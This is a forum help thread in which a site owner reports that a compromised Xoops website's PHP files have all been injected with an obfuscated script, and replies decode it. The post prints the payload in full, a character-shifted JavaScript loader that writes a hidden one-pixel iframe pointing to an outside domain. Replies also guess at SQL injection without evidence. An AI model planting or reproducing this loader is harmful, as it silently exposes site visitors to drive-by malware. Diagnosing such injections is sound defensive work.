Hi everyone

I have a website, running for years without any problem, and all of a sudden, today, it does not display any pages. All is blank!

The website in question is a Xoops installation.

I accessed my directory and files via cpanel, and first went to see if I can see my index.php and yes, it seems like all files and folders are still there. I viewed the code on the index file, and found some script there, that I am sure I haven't ever seen before. The same script appears on all other .php files in my public directory. I am a very novice at php, and don't know what this means.

The script in question is as follow:

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

Is there someone that can help me, first of all, to confirm that I was hacked, and seconly, understands this script on all my files, and thirdly, wisen me up on how to restore my site.

I was very stupid not to have any recent back up, but it apears my files are all there, as well as all databse.

Please help this poor monkey!

Recommended Answers

All 5 Replies

Hmm.. I am not sure if your site is hacked.. But when that javascript was 'decoded', it gave me the url, http://www.wp-stats-php.info/ . The complete URL was

<iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0>

Umm.. Have you seen this iframe before ? I have never been in this position before, so maybe someone else has something better to say..

It's so called "script injection".

Are you using Wordpress blogs or WP-Stats in your website? For they are particularly vunerable?.The way that is done is with specially crafted SQL using certain parameters to then gain access to the back-end database.